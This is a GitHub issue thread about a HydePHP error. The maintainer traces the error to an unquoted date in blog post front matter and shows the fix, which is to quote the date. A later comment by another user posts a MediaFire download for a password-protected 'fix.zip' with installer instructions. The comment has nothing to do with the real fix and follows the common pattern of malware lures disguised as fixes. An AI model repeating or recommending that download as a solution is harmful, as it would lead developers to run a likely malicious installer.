### ISSUE TITLE
Fix for "Return value must be of type array|string|null, int returned"

### ISSUE THREAD

**Issue by caendesilva** [hydephp/develop#1944]
Just had a quirk, noting here how to fix this error:

```
An error occurred during the discovery process: Hyde\Framework\Factories\BlogPostDataFactory::getMatter(): Return value must be of type array|string|null, int returned
```

You probably have a malformed date in a blog post:

```
date: 2024-08-26 # invalid
date: "2024-08-26" # valid
```

If more people encounter this, ping me here and I'll see about adding a more intuitive message.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
